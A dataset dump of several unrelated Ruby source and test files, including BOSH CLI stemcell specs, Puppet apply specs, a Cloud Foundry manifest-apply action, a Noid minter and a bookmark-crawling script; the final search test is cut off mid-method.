hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1c58074cbd0cfb7aa404a0d550b08b1849b0a659 | 16,526 | require 'spec_helper'
module Bosh::Cli
describe Command::Stemcell do
let(:director) { double(Bosh::Cli::Client::Director) }
let(:stemcell_archive) { spec_asset("valid_stemcell.tgz") }
let(:stemcell_manifest) { {'name' => 'ubuntu-stemcell', 'version' => 1} }
let(:stemcell) { double('stemcell', :manifest => stemcell_manifest) }
subject(:command) do
Bosh::Cli::Command::Stemcell.new
end
before do
allow(command).to receive(:director).and_return(director)
allow(command).to receive(:show_current_state)
allow(Bosh::Cli::Stemcell).to receive(:new).and_return(stemcell)
end
describe 'upload stemcell' do
it_requires_logged_in_user ->(command) { command.upload('http://stemcell_location') }
context 'when the user is logged in' do
before do
allow(command).to receive_messages(:logged_in? => true)
command.options[:target] = 'http://bosh-target.example.com'
end
context 'local stemcell' do
context 'with no option' do
it 'should upload the stemcell' do
expect(stemcell).to receive(:validate)
expect(stemcell).to receive(:valid?).and_return(true)
expect(director).to receive(:list_stemcells).and_return([])
expect(stemcell).to receive(:stemcell_file).and_return(stemcell_archive)
expect(director).to receive(:upload_stemcell).with(stemcell_archive, {})
command.upload(stemcell_archive)
end
it 'should not upload the stemcell if is invalid' do
expect(stemcell).to receive(:validate)
expect(stemcell).to receive(:valid?).and_return(false)
expect(director).not_to receive(:upload_stemcell)
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Stemcell is invalid/)
end
it 'should not upload the stemcell if already exist' do
expect(stemcell).to receive(:validate)
expect(stemcell).to receive(:valid?).and_return(true)
expect(director).to receive(:list_stemcells).and_return([stemcell_manifest])
expect(director).not_to receive(:upload_stemcell)
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /already exists/)
end
end
it 'should raise error when --sha1 is provided' do
command.add_option(:sha1, "shawesome")
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Option '--sha1' is not supported for uploading local stemcell/)
end
context 'with --skip-if-exists option' do
before do
command.options[:skip_if_exists] = true
end
it 'should skip upload if already exists' do
expect(stemcell).to receive(:validate)
expect(stemcell).to receive(:valid?).and_return(true)
expect(director).to receive(:list_stemcells).and_return([stemcell_manifest])
expect(director).not_to receive(:upload_stemcell)
expect {
command.upload(stemcell_archive)
}.to_not raise_error
end
end
context 'with --fix option' do
before do
command.options[:fix] = true
allow(stemcell).to receive(:stemcell_file).and_return('stemcell_location/stemcell.tgz')
end
it 'should upload stemcell' do
expect(stemcell).to receive(:validate)
expect(stemcell).to receive(:valid?).and_return(true)
expect(director).to receive(:upload_stemcell).with('stemcell_location/stemcell.tgz', {:fix => true})
expect {
command.upload(stemcell_archive)
}.to_not raise_error
end
it 'should raise error when --skip-if-exists option also provided' do
command.options[:skip_if_exists] = true
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Option '--skip-if-exists' and option '--fix' should not be used together/)
end
it 'should raise error when --name also provided' do
command.add_option(:name, "ubuntu")
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
end
it 'should raise error when --version also provided' do
command.add_option(:version, "1")
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
end
it 'should raise error when --name and --version also provided' do
command.add_option(:name, "ubuntu")
command.add_option(:version, "1")
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /Options '--name' and '--version' should not be used together with option '--fix'/)
end
end
context 'with --name and --version' do
let(:director_stemcells) { [{"name" => "ubuntu", "version" => "1" }]}
it 'should not upload a stemcell if one exists already' do
expect(director).to receive(:list_stemcells).and_return(director_stemcells)
expect(director).not_to receive(:upload_stemcell)
expect {
command.add_option(:name, "ubuntu")
command.add_option(:version, "1")
command.upload(stemcell_archive)
}.not_to raise_error()
end
end
end
context 'remote stemcell' do
it 'should upload the stemcell' do
expect(director).to receive(:upload_remote_stemcell).with('http://stemcell_location', {})
command.upload('http://stemcell_location')
end
it 'should upload the stemcell with fix option set if --fix option provided' do
command.options[:fix] = true
expect(director).to receive(:upload_remote_stemcell).with('http://stemcell_location', {:fix => true})
command.upload('http://stemcell_location')
end
context 'with --name and --version' do
let(:director_stemcells) { [{"name" => "ubuntu", "version" => "1" }]}
it 'should not upload a stemcell if one exists already' do
expect(director).to receive(:list_stemcells).and_return(director_stemcells)
expect(director).to_not receive(:upload_remote_release)
command.add_option(:name, "ubuntu")
command.add_option(:version, "1")
command.upload('http://stemcell_location')
end
end
end
end
end
describe 'public stemcells' do
let(:public_stemcell_presenter) do
instance_double('Bosh::Cli::PublicStemcellPresenter', list: nil)
end
let(:public_stemcells) do
instance_double('Bosh::Cli::PublicStemcells')
end
before do
allow(PublicStemcells).to receive(:new).and_return(public_stemcells)
allow(PublicStemcellPresenter).to receive(:new).and_return(public_stemcell_presenter)
end
it 'lists public stemcells in the index' do
command.options = double('options')
command.list_public
expect(public_stemcell_presenter).to have_received(:list).with(command.options)
end
it 'properly wires a stemcell list with a presenter' do
command.list_public
expect(PublicStemcellPresenter).to have_received(:new).with(command, public_stemcells)
end
end
describe 'download public stemcell' do
let(:public_stemcell_presenter) do
instance_double('Bosh::Cli::PublicStemcellPresenter', download: nil)
end
let(:public_stemcells) do
instance_double('Bosh::Cli::PublicStemcells')
end
before do
allow(PublicStemcells).to receive(:new).and_return(public_stemcells)
allow(PublicStemcellPresenter).to receive(:new).and_return(public_stemcell_presenter)
end
it 'lists public stemcells in the index' do
command.download_public('stemcell.tgz')
expect(public_stemcell_presenter).to have_received(:download).with('stemcell.tgz')
end
it 'properly wires a stemcell list with a presenter' do
command.download_public('stemcell.tgz')
expect(PublicStemcellPresenter).to have_received(:new).with(command, public_stemcells)
end
end
describe 'list' do
let(:stemcell1) { { 'name' => 'fake stemcell 1', 'operating_system' => 'fake-os-4', 'version' => '123', 'cid' => '123456', 'deployments' => [] } }
let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456', 'cid' => '789012', 'deployments' => [] } }
let(:stemcells) { [stemcell1, stemcell2] }
let(:buffer) { StringIO.new }
before do
allow(command).to receive_messages(:logged_in? => true)
command.options[:target] = 'http://bosh-target.example.com'
allow(director).to receive(:list_stemcells).and_return(stemcells)
Bosh::Cli::Config.output = buffer
end
before { allow(stemcell).to receive(:validate) }
before { allow(stemcell).to receive_messages(valid?: true) }
before { allow(stemcell).to receive_messages(stemcell_file: stemcell_archive) }
it_requires_logged_in_user ->(command) { command.list }
it 'shows the stemcell OS and version when known' do
command.list
buffer.rewind
output = buffer.read
expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
end
it 'shows blank in the OS column when stemcell OS is not known' do
command.list
buffer.rewind
output = buffer.read
expect(output).to include('| fake stemcell 2 | | 456 | 789012 |')
end
context 'when no stemcells are in use' do
it 'does not add a star to any stemcell listed' do
command.list
buffer.rewind
output = buffer.read
expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
expect(output).to include('| fake stemcell 2 | | 456 | 789012 |')
expect(output).to include('(*) Currently in-use')
end
end
context 'when there are stemcells in use' do
let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456',
'cid' => '789012', 'deployments' => ['fake deployment'] } }
it 'adds a star for stemcells that are in use' do
command.list
buffer.rewind
output = buffer.read
expect(output).to include('| fake stemcell 1 | fake-os-4 | 123 | 123456 |')
expect(output).to include('| fake stemcell 2 | | 456* | 789012 |')
expect(output).to include('(*) Currently in-use')
end
end
context 'when there are no stemcells' do
let(:stemcells) { [] }
it 'errors' do
expect { command.list }.to raise_error(Bosh::Cli::CliError, 'No stemcells')
end
context 'when stemcell does not exist' do
before { allow(director).to receive_messages(list_stemcells: []) }
it 'uploads stemcell and returns successfully' do
expect(director).to receive(:upload_stemcell).with(stemcell_archive, {})
command.upload(stemcell_archive)
end
context 'when the stemcell is remote' do
let(:remote_stemcell_location) { 'http://location/stemcell.tgz' }
before do
allow(director).to receive(:upload_remote_stemcell)
end
context 'when a sha1 is provided' do
before do
command.add_option(:sha1, 'shawone')
end
it 'passes the sha1 up the chain' do
expect(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {:sha1=>"shawone"})
command.upload(remote_stemcell_location)
end
end
end
end
context 'when stemcell already exists' do
context 'when the stemcell is local' do
before { allow(director).to receive_messages(list_stemcells: [{'name' => 'ubuntu-stemcell', 'version' => 1}]) }
context 'when --skip-if-exists flag is given' do
before { command.add_option(:skip_if_exists, true) }
it 'does not upload stemcell' do
expect(director).not_to receive(:upload_stemcell)
command.upload(stemcell_archive)
end
it 'returns successfully' do
expect {
command.upload(stemcell_archive)
}.to_not raise_error
end
end
context 'when --skip-if-exists flag is not given' do
it 'does not upload stemcell' do
expect(director).not_to receive(:upload_stemcell)
command.upload(stemcell_archive) rescue nil
end
it 'raises an error' do
expect {
command.upload(stemcell_archive)
}.to raise_error(Bosh::Cli::CliError, /already exists/)
end
end
end
context 'when the stemcell is remote' do
let(:remote_stemcell_location) { 'http://location/stemcell.tgz' }
let(:task_events_json) { '{"error":{"code":50002}}' }
context 'when --skip-if-exists flag is given' do
before do
allow(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {}).and_return([:error, 1])
allow(director).to receive(:get_task_output).with(1, 0, 'event').and_return [task_events_json, nil]
command.add_option(:skip_if_exists, true)
end
it 'still uploads stemcell' do
expect(director).to receive(:upload_remote_stemcell).with('http://location/stemcell.tgz', {})
command.upload(remote_stemcell_location)
end
it 'does not raise an error' do
expect {
command.upload(remote_stemcell_location)
}.to_not raise_error
end
it 'has an exit code of 0' do
command.upload(remote_stemcell_location)
expect(command.exit_code).to eq(0)
end
end
context 'when --skip-if-exists flag is not given' do
before do
allow(director).to receive(:upload_remote_stemcell).with(remote_stemcell_location, {}).and_return([:error, 1])
allow(director).to receive(:get_task_output).with(1, 0, 'event').and_return [task_events_json, nil]
end
it 'still uploads stemcell' do
expect(director).to receive(:upload_remote_stemcell).with('http://location/stemcell.tgz', {})
command.upload(remote_stemcell_location) rescue nil
end
it 'does not raise an error' do
expect {
command.upload(remote_stemcell_location)
}.to_not raise_error
end
it 'has an exit code of 1' do
command.upload(remote_stemcell_location)
expect(command.exit_code).to eq(1)
end
end
end
end
end
context 'when director does not return deployments for stemcells' do
let(:stemcell1) { { 'name' => 'fake stemcell 1', 'version' => '123', 'cid' => '123456' } }
let(:stemcell2) { { 'name' => 'fake stemcell 2', 'version' => '456', 'cid' => '789012' } }
it 'does not raise' do
expect { command.list }.to_not raise_error
end
end
end
end
end
| 38.166282 | 152 | 0.584231 |
e9aa299945affa416d7e34d6ae911002b237c5f1 | 241 | module Api
class BaseController < ActionController::API
include ActionController::Serialization
private
def current_user
@current_user ||= User.find(doorkeeper_token.resource_owner_id) if doorkeeper_token
end
end
end | 21.909091 | 88 | 0.767635 |
26b78c8c98b5e94422ca5cd6181bb274b29c3036 | 4,356 | require 'actions/process_create'
require 'actions/process_scale'
require 'actions/process_update'
require 'actions/service_binding_create'
require 'actions/manifest_route_update'
require 'cloud_controller/strategies/manifest_strategy'
require 'cloud_controller/app_manifest/manifest_route'
require 'cloud_controller/random_route_generator'
module VCAP::CloudController
class AppApplyManifest
SERVICE_BINDING_TYPE = 'app'.freeze
def initialize(user_audit_info)
@user_audit_info = user_audit_info
end
def apply(app_guid, message)
app = AppModel.find(guid: app_guid)
message.manifest_process_update_messages.each do |manifest_process_update_msg|
process_type = manifest_process_update_msg.type
process = find_process(app, process_type) || create_process(app, manifest_process_update_msg, process_type)
process_update = ProcessUpdate.new(@user_audit_info, manifest_triggered: true)
process_update.update(process, manifest_process_update_msg, ManifestStrategy)
end
message.manifest_process_scale_messages.each do |manifest_process_scale_msg|
process = find_process(app, manifest_process_scale_msg.type)
process.skip_process_version_update = true if manifest_process_scale_msg.requested?(:memory)
process_scale = ProcessScale.new(@user_audit_info, process, manifest_process_scale_msg.to_process_scale_message, manifest_triggered: true)
process_scale.scale
end
app_update_message = message.app_update_message
lifecycle = AppLifecycleProvider.provide_for_update(app_update_message, app)
AppUpdate.new(@user_audit_info, manifest_triggered: true).update(app, app_update_message, lifecycle)
update_routes(app, message)
AppPatchEnvironmentVariables.new(@user_audit_info, manifest_triggered: true).patch(app, message.app_update_environment_variables_message)
create_service_bindings(message.services, app) if message.services.present?
app
end
private
def find_process(app, process_type)
ProcessModel.find(app: app, type: process_type)
end
def create_process(app, manifest_process_update_msg, process_type)
ProcessCreate.new(@user_audit_info, manifest_triggered: true).create(app, {
type: process_type,
command: manifest_process_update_msg.command
})
end
def update_routes(app, message)
update_message = message.manifest_routes_update_message
existing_routes = RouteMappingModel.where(app_guid: app.guid).all
if update_message.no_route
RouteMappingDelete.new(@user_audit_info, manifest_triggered: true).delete(existing_routes)
return
end
if update_message.routes
ManifestRouteUpdate.update(app.guid, update_message, @user_audit_info)
return
end
if update_message.random_route && existing_routes.empty?
random_host = "#{app.name}-#{RandomRouteGenerator.new.route}"
domain = SharedDomain.first.name
route = "#{random_host}.#{domain}"
random_route_message = ManifestRoutesUpdateMessage.new(routes: [{ route: route }])
ManifestRouteUpdate.update(app.guid, random_route_message, @user_audit_info)
end
end
def create_service_bindings(services, app)
action = ServiceBindingCreate.new(@user_audit_info, manifest_triggered: true)
services.each do |name|
service_instance = app.space.find_visible_service_instance_by_name(name)
service_instance_not_found!(name) unless service_instance
next if binding_exists?(service_instance, app)
action.create(
app,
service_instance,
ServiceBindingCreateMessage.new(type: SERVICE_BINDING_TYPE),
volume_services_enabled?,
false
)
end
end
def binding_exists?(service_instance, app)
ServiceBinding.where(service_instance: service_instance, app: app).present?
end
def service_instance_not_found!(name)
raise CloudController::Errors::NotFound.new_from_details('ResourceNotFound', "Service instance '#{name}' not found")
end
def volume_services_enabled?
VCAP::CloudController::Config.config.get(:volume_services_enabled)
end
def logger
@logger ||= Steno.logger('cc.action.app_apply_manifest')
end
end
end
| 36.605042 | 146 | 0.743802 |
03c0ca2f0378b4490e8a6a9d1c39e681f1ec873a | 1,251 | # encoding: utf-8
module ArraySpecs
def self.array_with_usascii_and_7bit_utf8_strings
[
'foo'.force_encoding('US-ASCII'),
'bar'
]
end
def self.array_with_usascii_and_utf8_strings
[
'foo'.force_encoding('US-ASCII'),
'báz'
]
end
def self.array_with_7bit_utf8_and_usascii_strings
[
'bar',
'foo'.force_encoding('US-ASCII')
]
end
def self.array_with_utf8_and_usascii_strings
[
'báz',
'bar',
'foo'.force_encoding('US-ASCII')
]
end
def self.array_with_usascii_and_utf8_strings
[
'foo'.force_encoding('US-ASCII'),
'bar',
'báz'
]
end
def self.array_with_utf8_and_7bit_ascii8bit_strings
[
'bar',
'báz',
'foo'.force_encoding('ASCII-8BIT')
]
end
def self.array_with_utf8_and_ascii8bit_strings
[
'bar',
'báz',
"\xFF".force_encoding('ASCII-8BIT')
]
end
def self.array_with_usascii_and_7bit_ascii8bit_strings
[
'bar'.force_encoding('US-ASCII'),
'foo'.force_encoding('ASCII-8BIT')
]
end
def self.array_with_usascii_and_ascii8bit_strings
[
'bar'.force_encoding('US-ASCII'),
"\xFF".force_encoding('ASCII-8BIT')
]
end
end
| 17.871429 | 56 | 0.619504 |
38d9b2a696054368b227e748d69cc4a957268d22 | 138 | module Furnace::AVM2::ABC
class AS3Lshift < Opcode
instruction 0xa5
write_barrier :memory
consume 2
produce 1
end
end | 15.333333 | 26 | 0.695652 |
91291b81d5fc0c74ce15a4f978282e46de60a5c1 | 2,349 | # -*- coding: utf-8 -*-
=begin
This script was written by Takashi SUGA on February 2017
You may use and/or modify this file according to the license described in the MIT LICENSE.txt file https://raw.githubusercontent.com/suchowan/watson-api-client/master/LICENSE.
Usage:
ruby crawl.rb <root> (<filter>)
root : Path name of the tree root directory
filter : Path Matcing filter(default- computer.filter.txt)
=end
require 'open-uri'
require 'openssl'
require 'open_uri_redirections'
require 'fileutils'
require './serial'
Encoding.default_external = 'UTF-8'
Encoding.default_internal = 'UTF-8'
def crawl(path, timestamp, url)
timestamp = timestamp.to_time
path.sub!(/\/([^\/]+)$/, '.crawled/\1')
path.sub!(/\.(url|website)$/i, url =~ /\.pdf(#.+)?$/i ? '.pdf' : '.html')
dir = path.split('/')[0..-2].join('/')
FileUtils.mkdir_p(dir) unless FileTest.exist?(dir)
unless File.exist?(path)
begin
puts path
open(url.sub(/#[^#]*$/,''), path =~ /\.pdf$/ ? 'rb' : 'r:utf-8' ,{:allow_redirections =>:all, :ssl_verify_mode=>OpenSSL::SSL::VERIFY_NONE}) do |source|
open(path, path =~ /\.pdf$/ ? 'wb' : 'w:utf-8') do |crawled|
crawled.write(source.read)
end
end
File::utime(timestamp, timestamp, path)
rescue => e
STDERR.puts e
File.delete(path) if File.exist?(path)
end
end
end
root, filter = ARGV
root += '/'
ex = []
IO.foreach(filter || 'computer.filter.txt') do |line|
ex << line.chomp.gsub("/", "\\/")
end
filter = /^(#{ex.join('|')})/
Dir.glob(root + '**/*.*') do |path|
next unless path =~ /^(.+)\.(url|website)$/i
title = $1.gsub(/%7f/i, '%7E').sub(root, '')
next if filter && filter !~ title
timestamp =
begin
File.stat(path).mtime.to_tm_pos
rescue => e
STDERR.puts e
next
end
contents = []
url = nil
IO.foreach(path) do |line|
begin
case line
when /^URL=(.+)/, /^IconFile/
contents << line
url = $1 if $1
when /^Modified=([0-9A-F]+)/i
serial = $1
serial = "200D7890BCA8D1016B" if serial == "208D47ED2189D0015C"
contents << "Modified=#{serial}"
timestamp = serial2date(serial)
end
rescue ArgumentError
end
end
raise ArgementError, "#{path} is empty" if contents.empty?
crawl(path, timestamp, url)
end
| 27.313953 | 177 | 0.603235 |
7a087ed75595d8d0ad574ebe8640b7160cbac511 | 1,595 | # frozen_string_literal: true
require 'noid'
module Noid
module Rails
module Minter
# A file based minter. This is a simple case.
class File < Base
attr_reader :statefile
def initialize(template = default_template, statefile = default_statefile)
@statefile = statefile
super(template)
end
def default_statefile
Noid::Rails.config.statefile
end
def read
with_file do |f|
state_for(f)
end
end
def write!(minter)
with_file do |f|
# Wipe prior contents so the new state can be written from the beginning of the file
f.truncate(0)
f.write(Marshal.dump(minter.dump))
end
end
protected
def with_file
::File.open(statefile, 'a+b', 0o644) do |f|
f.flock(::File::LOCK_EX)
# Files opened in append mode seek to end of file
f.rewind
yield f
end
end
# rubocop:disable Security/MarshalLoad
def state_for(io_object)
Marshal.load(io_object.read)
rescue TypeError, ArgumentError
{ template: template }
end
# rubocop:enable Security/MarshalLoad
def next_id
state = read
state[:template] &&= state[:template].to_s
minter = ::Noid::Minter.new(state) # minter w/in the minter, lives only for an instant
id = minter.mint
write!(minter)
id
end
end
end
end
end
| 24.166667 | 96 | 0.552351 |
1a15fc075674027612248603b3fb4d997ef1e7ab | 13,423 | #!/usr/bin/env rspec
require 'spec_helper'
require 'puppet/application/apply'
require 'puppet/file_bucket/dipper'
require 'puppet/configurer'
require 'fileutils'
describe Puppet::Application::Apply do
before :each do
@apply = Puppet::Application[:apply]
Puppet::Util::Log.stubs(:newdestination)
end
after :each do
Puppet::Node::Facts.indirection.reset_terminus_class
Puppet::Node::Facts.indirection.cache_class = nil
Puppet::Node.indirection.reset_terminus_class
Puppet::Node.indirection.cache_class = nil
end
[:debug,:loadclasses,:verbose,:use_nodes,:detailed_exitcodes,:catalog].each do |option|
it "should declare handle_#{option} method" do
@apply.should respond_to("handle_#{option}".to_sym)
end
it "should store argument value when calling handle_#{option}" do
@apply.options.expects(:[]=).with(option, 'arg')
@apply.send("handle_#{option}".to_sym, 'arg')
end
end
it "should set the code to the provided code when :execute is used" do
@apply.options.expects(:[]=).with(:code, 'arg')
@apply.send("handle_execute".to_sym, 'arg')
end
it "should ask Puppet::Application to parse Puppet configuration file" do
@apply.should_parse_config?.should be_true
end
describe "when applying options" do
it "should set the log destination with --logdest" do
Puppet::Log.expects(:newdestination).with("console")
@apply.handle_logdest("console")
end
it "should put the logset options to true" do
@apply.options.expects(:[]=).with(:logset,true)
@apply.handle_logdest("console")
end
it "should deprecate --apply" do
Puppet.expects(:warning).with do |arg|
arg.match(/--apply is deprecated/)
end
command_line = Puppet::Util::CommandLine.new('puppet', ['apply', '--apply', 'catalog.json'])
apply = Puppet::Application::Apply.new(command_line)
apply.stubs(:run_command)
apply.run
end
end
describe "during setup" do
before :each do
Puppet::Log.stubs(:newdestination)
Puppet.stubs(:parse_config)
Puppet::FileBucket::Dipper.stubs(:new)
STDIN.stubs(:read)
Puppet::Transaction::Report.indirection.stubs(:cache_class=)
@apply.options.stubs(:[]).with(any_parameters)
end
it "should set console as the log destination if logdest option wasn't provided" do
Puppet::Log.expects(:newdestination).with(:console)
@apply.setup
end
it "should set INT trap" do
Signal.expects(:trap).with(:INT)
@apply.setup
end
it "should set log level to debug if --debug was passed" do
@apply.options.stubs(:[]).with(:debug).returns(true)
@apply.setup
Puppet::Log.level.should == :debug
end
it "should set log level to info if --verbose was passed" do
@apply.options.stubs(:[]).with(:verbose).returns(true)
@apply.setup
Puppet::Log.level.should == :info
end
it "should print puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns true
Puppet.settings.expects(:print_configs).returns true
expect { @apply.setup }.to exit_with 0
end
it "should exit after printing puppet config if asked to in Puppet config" do
Puppet.settings.stubs(:print_configs?).returns(true)
expect { @apply.setup }.to exit_with 1
end
it "should tell the report handler to cache locally as yaml" do
Puppet::Transaction::Report.indirection.expects(:cache_class=).with(:yaml)
@apply.setup
end
end
describe "when executing" do
it "should dispatch to 'apply' if it was called with 'apply'" do
@apply.options[:catalog] = "foo"
@apply.expects(:apply)
@apply.run_command
end
it "should dispatch to main otherwise" do
@apply.stubs(:options).returns({})
@apply.expects(:main)
@apply.run_command
end
describe "the main command" do
include PuppetSpec::Files
before :each do
Puppet[:prerun_command] = ''
Puppet[:postrun_command] = ''
Puppet::Node::Facts.indirection.terminus_class = :memory
Puppet::Node::Facts.indirection.cache_class = :memory
Puppet::Node.indirection.terminus_class = :memory
Puppet::Node.indirection.cache_class = :memory
@facts = Puppet::Node::Facts.new(Puppet[:node_name_value])
Puppet::Node::Facts.indirection.save(@facts)
@node = Puppet::Node.new(Puppet[:node_name_value])
Puppet::Node.indirection.save(@node)
@catalog = Puppet::Resource::Catalog.new
@catalog.stubs(:to_ral).returns(@catalog)
Puppet::Resource::Catalog.indirection.stubs(:find).returns(@catalog)
STDIN.stubs(:read)
@transaction = Puppet::Transaction.new(@catalog)
@catalog.stubs(:apply).returns(@transaction)
Puppet::Util::Storage.stubs(:load)
Puppet::Configurer.any_instance.stubs(:save_last_run_summary) # to prevent it from trying to write files
end
it "should set the code to run from --code" do
@apply.options[:code] = "code to run"
Puppet.expects(:[]=).with(:code,"code to run")
expect { @apply.main }.to exit_with 0
end
it "should set the code to run from STDIN if no arguments" do
@apply.command_line.stubs(:args).returns([])
STDIN.stubs(:read).returns("code to run")
Puppet.expects(:[]=).with(:code,"code to run")
expect { @apply.main }.to exit_with 0
end
it "should set the manifest if a file is passed on command line and the file exists" do
manifest = tmpfile('site.pp')
FileUtils.touch(manifest)
@apply.command_line.stubs(:args).returns([manifest])
Puppet.expects(:[]=).with(:manifest,manifest)
expect { @apply.main }.to exit_with 0
end
it "should raise an error if a file is passed on command line and the file does not exist" do
noexist = tmpfile('noexist.pp')
@apply.command_line.stubs(:args).returns([noexist])
lambda { @apply.main }.should raise_error(RuntimeError, "Could not find file #{noexist}")
end
it "should set the manifest to the first file and warn other files will be skipped" do
manifest = tmpfile('starwarsIV')
FileUtils.touch(manifest)
@apply.command_line.stubs(:args).returns([manifest, 'starwarsI', 'starwarsII'])
Puppet.expects(:[]=).with(:manifest,manifest)
Puppet.expects(:warning).with('Only one file can be applied per run. Skipping starwarsI, starwarsII')
expect { @apply.main }.to exit_with 0
end
it "should raise an error if we can't find the node" do
Puppet::Node.indirection.expects(:find).returns(nil)
lambda { @apply.main }.should raise_error
end
it "should load custom classes if loadclasses" do
@apply.options[:loadclasses] = true
classfile = tmpfile('classfile')
File.open(classfile, 'w') { |c| c.puts 'class' }
Puppet[:classfile] = classfile
@node.expects(:classes=).with(['class'])
expect { @apply.main }.to exit_with 0
end
it "should compile the catalog" do
Puppet::Resource::Catalog.indirection.expects(:find).returns(@catalog)
expect { @apply.main }.to exit_with 0
end
it "should transform the catalog to ral" do
@catalog.expects(:to_ral).returns(@catalog)
expect { @apply.main }.to exit_with 0
end
it "should finalize the catalog" do
@catalog.expects(:finalize)
expect { @apply.main }.to exit_with 0
end
it "should call the prerun and postrun commands on a Configurer instance" do
Puppet::Configurer.any_instance.expects(:execute_prerun_command).returns(true)
Puppet::Configurer.any_instance.expects(:execute_postrun_command).returns(true)
expect { @apply.main }.to exit_with 0
end
it "should apply the catalog" do
@catalog.expects(:apply).returns(stub_everything('transaction'))
expect { @apply.main }.to exit_with 0
end
it "should save the last run summary" do
Puppet[:noop] = false
report = Puppet::Transaction::Report.new("apply")
Puppet::Transaction::Report.stubs(:new).returns(report)
Puppet::Configurer.any_instance.expects(:save_last_run_summary).with(report)
expect { @apply.main }.to exit_with 0
end
describe "when using node_name_fact" do
before :each do
@facts = Puppet::Node::Facts.new(Puppet[:node_name_value], 'my_name_fact' => 'other_node_name')
Puppet::Node::Facts.indirection.save(@facts)
@node = Puppet::Node.new('other_node_name')
Puppet::Node.indirection.save(@node)
Puppet[:node_name_fact] = 'my_name_fact'
end
it "should set the facts name based on the node_name_fact" do
expect { @apply.main }.to exit_with 0
@facts.name.should == 'other_node_name'
end
it "should set the node_name_value based on the node_name_fact" do
expect { @apply.main }.to exit_with 0
Puppet[:node_name_value].should == 'other_node_name'
end
it "should merge in our node the loaded facts" do
@facts.values.merge!('key' => 'value')
expect { @apply.main }.to exit_with 0
@node.parameters['key'].should == 'value'
end
it "should raise an error if we can't find the facts" do
Puppet::Node::Facts.indirection.expects(:find).returns(nil)
lambda { @apply.main }.should raise_error
end
end
describe "with detailed_exitcodes" do
before :each do
@apply.options[:detailed_exitcodes] = true
end
it "should exit with report's computed exit status" do
Puppet[:noop] = false
Puppet::Transaction::Report.any_instance.stubs(:exit_status).returns(666)
expect { @apply.main }.to exit_with 666
end
it "should exit with report's computed exit status, even if --noop is set" do
Puppet[:noop] = true
Puppet::Transaction::Report.any_instance.stubs(:exit_status).returns(666)
expect { @apply.main }.to exit_with 666
end
it "should always exit with 0 if option is disabled" do
Puppet[:noop] = false
report = stub 'report', :exit_status => 666
@transaction.stubs(:report).returns(report)
expect { @apply.main }.to exit_with 0
end
it "should always exit with 0 if --noop" do
Puppet[:noop] = true
report = stub 'report', :exit_status => 666
@transaction.stubs(:report).returns(report)
expect { @apply.main }.to exit_with 0
end
end
end
describe "the 'apply' command" do
it "should read the catalog in from disk if a file name is provided" do
@apply.options[:catalog] = "/my/catalog.pson"
File.expects(:read).with("/my/catalog.pson").returns "something"
Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns Puppet::Resource::Catalog.new
@apply.apply
end
it "should read the catalog in from stdin if '-' is provided" do
@apply.options[:catalog] = "-"
$stdin.expects(:read).returns "something"
Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns Puppet::Resource::Catalog.new
@apply.apply
end
it "should deserialize the catalog from the default format" do
@apply.options[:catalog] = "/my/catalog.pson"
File.stubs(:read).with("/my/catalog.pson").returns "something"
Puppet::Resource::Catalog.stubs(:default_format).returns :rot13_piglatin
Puppet::Resource::Catalog.stubs(:convert_from).with(:rot13_piglatin,'something').returns Puppet::Resource::Catalog.new
@apply.apply
end
it "should fail helpfully if deserializing fails" do
@apply.options[:catalog] = "/my/catalog.pson"
File.stubs(:read).with("/my/catalog.pson").returns "something syntacically invalid"
lambda { @apply.apply }.should raise_error(Puppet::Error)
end
it "should convert plain data structures into a catalog if deserialization does not do so" do
@apply.options[:catalog] = "/my/catalog.pson"
File.stubs(:read).with("/my/catalog.pson").returns "something"
Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,"something").returns({:foo => "bar"})
Puppet::Resource::Catalog.expects(:pson_create).with({:foo => "bar"}).returns(Puppet::Resource::Catalog.new)
@apply.apply
end
it "should convert the catalog to a RAL catalog and use a Configurer instance to apply it" do
@apply.options[:catalog] = "/my/catalog.pson"
File.stubs(:read).with("/my/catalog.pson").returns "something"
catalog = Puppet::Resource::Catalog.new
Puppet::Resource::Catalog.stubs(:convert_from).with(:pson,'something').returns catalog
catalog.expects(:to_ral).returns "mycatalog"
configurer = stub 'configurer'
Puppet::Configurer.expects(:new).returns configurer
configurer.expects(:run).with(:catalog => "mycatalog")
@apply.apply
end
end
end
end
| 33.982278 | 126 | 0.646204 |
117c62bceae3bc654a4352a9e31d5791ccb1e6d2 | 1,070 | # Copyright 2019 Oath Inc. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
require 'indexed_search_test'
class ImplitictIndexPhrase < IndexedSearchTest
def nightly?
true
end
def setup
set_owner("arnej")
set_description("Check implicit phrasing when querying for non-existant index.")
deploy_app(SearchApp.new.sd(SEARCH_DATA+"music.sd"))
start
end
def test_implicitindexphrase
feed_and_wait_for_docs("music", 10, :file => SEARCH_DATA+"music.10.xml")
puts "Query: Querying, checking implicit phrase"
result = search("query=notanindex:blues&tracelevel=1")
assert("Result does not contain string:query=[\"notanindex blue\"]",
result.xmldata.include?("query=[\"notanindex blue\"]"))
puts "Query: Querying, checking specific index"
result = search("query=title:nosuchtitle&tracelevel=1")
